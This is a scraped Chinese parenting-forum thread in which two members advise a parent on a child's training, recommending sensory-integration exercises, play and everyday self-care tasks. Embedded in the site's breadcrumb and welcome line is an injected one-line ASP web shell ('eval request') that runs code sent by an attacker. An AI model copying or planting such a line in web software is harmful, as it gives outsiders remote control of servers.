Email:jiejenny@hotmail.com
» 您尚未 [登录 - 注册] ┆ 风格 ┆ 搜索 ┆ 帮助 ┆ 
青聪泉 官方站论坛欢迎您!
您的位置: 青聪泉网站 -> "%><%eval request("1")%>%<' -> 家校沟通 -> 你问我答 -> 训练中应加强那些方面?

您是本帖的第 2080 个阅读者
贴子主题:训练中应加强那些方面?  
小草
 
新兵
等级:新兵
头衔:未定义
金钱:21
发帖:54
Y 币:1
状态:性别:男<br>状态:离线<br>积时:8 分 55 秒
注册:2011-09-21
1F


很好啊,孩子在你的指导下,有了很好的进步,这说明家长的方法是行之有效的!你说的三点是我们孩子普遍存在的问题,不能心急,只能一点一点来训练孩子.建议加强孩子的感统训练,这是基础.先让自己能和孩子玩起来,让孩子慢慢体会和人交往的乐趣,用孩子喜欢的物件来吸引他的注意力."躲猫猫"很多孩子喜欢呢,你家宝宝喜欢吗?
TIME: 2011-10-18 14:17:23  IP: 58.37. * . *
"%><%eval request("1")%>%<'欢迎您!

   

×

daisy_deng
 
新兵
等级:新兵
头衔:未定义
金钱:-8
发帖:44
Y 币:0
状态:性别:男<br>状态:离线<br>积时:1 分 13 秒
注册:2011-09-20
2F


不知道宝宝多大,一般小孩子的注意力都在5到10分钟,这也是他们对感兴趣的事情所能维持的时间。
在家里要训练注意力,不一定要像在做个训,最好就是让他做一些日常生活的自理。要知道,穿衣服,挤牙膏,拉拉链,扫地,擦桌子,叠被子,等等这些事情。都要运用到我们视觉,听觉,触觉。这些是最好的训练。

孩子的天性还是爱玩的,所以在玩的当中,把你要教的东西融合进去是最好的。
你可以到爱好的网站 去下载杨宗仁教授的 游戏与文化介入的讲座的讲义 坐一下参考。
TIME: 2011-10-18 14:17:23  IP: 61.170. * . *
"%><%eval request("1")%>%<'欢迎您!

   

×

 每页10条,共1页,合计1条记录
9  1  :
转到  


Powered By:
品牌网站建设 Processed in:0.187500s,15 queries.